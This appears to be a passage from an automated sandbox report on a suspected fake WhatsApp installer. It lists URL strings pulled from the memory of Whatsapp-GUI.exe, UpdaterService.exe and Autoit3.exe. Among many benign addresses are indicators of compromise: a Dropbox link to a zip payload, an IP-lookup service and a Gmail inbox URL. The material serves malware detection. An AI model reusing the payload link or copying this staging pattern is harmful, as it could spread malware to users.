Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.000000000344C000.00000004.00000800.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000003.2227403082.00000000047B3000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000003.2230168514.00000000046D6000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000003.2227976170.00000000047B1000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe.0.dr, Autoit3.exe.3.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Whatsapp-GUI.exe	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.000000000344C000.00000004.00000800.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000003.2227403082.00000000047B3000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000003.2230168514.00000000046D6000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000003.2227976170.00000000047B1000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe.0.dr, Autoit3.exe.3.dr	String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edge-block-www-env.dropbox-dns.com
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edge-block-www-env.dropbox-dns.comd
Source: UpdaterService.exe, UpdaterService.exe, 00000003.00000002.3941184211.0000000003EC1000.00000040.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000002.3940858660.0000000003D04000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000002.3942078609.0000000004E10000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000003.2230084824.0000000004A40000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000003.2229666287.0000000004DA8000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000002.3941115350.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, Autoit3.exe, 00000008.00000002.2391311533.0000000004534000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.2391730734.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000009.00000002.2473661305.0000000004400000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000009.00000002.2473412421.0000000004344000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000009.00000002.2473753332.0000000004501000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ipinfo.io/ip
Source: UpdaterService.exe, 00000003.00000002.3941184211.0000000003EC1000.00000040.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000002.3940858660.0000000003D04000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000002.3942078609.0000000004E10000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000003.2230084824.0000000004A40000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000003.2229666287.0000000004DA8000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000002.3941115350.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.2391311533.0000000004534000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.2391730734.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000009.00000002.2473661305.0000000004400000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000009.00000002.2473412421.0000000004344000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000009.00000002.2473753332.0000000004501000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ipinfo.io/ipU
Source: Whatsapp-GUI.exe	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: Whatsapp-GUI.exe	String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: Whatsapp-GUI.exe	String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.000000000344C000.00000004.00000800.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000003.2227403082.00000000047B3000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000003.2230168514.00000000046D6000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000003.2227976170.00000000047B1000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe.0.dr, Autoit3.exe.3.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.000000000344C000.00000004.00000800.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000003.2227403082.00000000047B3000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000003.2230168514.00000000046D6000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000003.2227976170.00000000047B1000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe.0.dr, Autoit3.exe.3.dr	String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.000000000344C000.00000004.00000800.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000003.2227403082.00000000047B3000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000003.2230168514.00000000046D6000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000003.2227976170.00000000047B1000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe.0.dr, Autoit3.exe.3.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Whatsapp-GUI.exe	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.000000000335E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Whatsapp-GUI.exe	String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.000000000344C000.00000004.00000800.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000003.2227403082.00000000047B3000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000003.2230168514.00000000046D6000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000003.2227976170.00000000047B1000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe.0.dr, Autoit3.exe.3.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Whatsapp-GUI.exe	String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.000000000344C000.00000004.00000800.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000003.2227403082.00000000047B3000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000003.2230168514.00000000046D6000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000003.2227976170.00000000047B1000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe.0.dr, Autoit3.exe.3.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: Whatsapp-GUI.exe	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://uceaa44e3ed7199ee43fadd414c8.dl.dropboxusercontent.com
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://uceaa44e3ed7199ee43fadd414c8.dl.dropboxusercontent.comd
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www-env.dropbox-dns.com
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www-env.dropbox-dns.comd
Source: UpdaterService.exe, 00000003.00000003.2227403082.00000000047B3000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000002.3939301227.0000000000399000.00000002.00000001.01000000.0000000C.sdmp, UpdaterService.exe, 00000003.00000003.2230168514.00000000046D6000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000003.2227976170.00000000047B1000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmp, Autoit3.exe, 00000009.00000000.2439797326.0000000000D09000.00000002.00000001.01000000.0000000E.sdmp, Autoit3.exe.0.dr, Autoit3.exe.3.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.dropbox.com
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.dropbox.comd
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://a.sprig.com/
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/gsi/client
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.login.yahoo.com/
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://app.hellofax.com/
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://app.hellosign.com/
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://canny.io/sdk.js
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cfl.dropboxstatic.com/static/
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dl-web.dropbox.com/
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/fsip/
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/fsip/
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/fsip/
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.sandbox.google.com/document/fsip/
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.sandbox.google.com/presentation/fsip/
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.sandbox.google.com/spreadsheets/fsip/
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docsend.com/
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://experience.dropbox.com/
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://help.dropbox.com/
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://instructorledlearning.dropboxbusiness.com/
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.yahoo.com/
Source: Autoit3.exe, 00000009.00000002.2473753332.0000000004501000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/u/0/#inbox
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://navi.dropbox.jp/
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://officeapps-df.live.com
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://officeapps.live.com
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://onedrive.live.com/picker
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pal-test.adyen.com
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://paper.dropbox.com/
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://paper.dropbox.com/cloud-docs/edit
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://photos.dropbox.com/
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sales.dropboxbusiness.com/
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://selfguidedlearning.dropboxbusiness.com/
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://showcase.dropbox.com/
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uceaa44e3ed7199ee43fadd414c8.dl.dropboxusercontent.com
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uceaa44e3ed7199ee43fadd414c8.dl.dropboxusercontent.com/cd/0/get/CgQAiHznR0-yJXtQgIcAQDe00JEJ
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.000000000344C000.00000004.00000800.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000003.2227403082.00000000047B3000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000003.2230168514.00000000046D6000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000003.2227976170.00000000047B1000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe.0.dr, Autoit3.exe.3.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.docsend.com/
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.000000000335E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/encrypted_folder_download/service_worker.js
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/page_success/
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/pithos/
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/playlist/
Source: Whatsapp-GUI.exe	String found in binary or memory: https://www.dropbox.com/scl/fi/puclhgu65e9r37o3vcp9m/yutighh.zip?rlkey=csgz30n1xx1twdk9ue4m4p16s&st=
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/service_worker.js
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/static/api/
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/static/serviceworker/
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/v/s/playlist/
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropboxstatic.com/static/
Source: Autoit3.exe.3.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.000000000344C000.00000004.00000800.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000003.2227403082.00000000047B3000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000003.2230168514.00000000046D6000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000003.2227976170.00000000047B1000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe.0.dr, Autoit3.exe.3.dr	String found in binary or memory: https://www.globalsign.com/repository/06
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
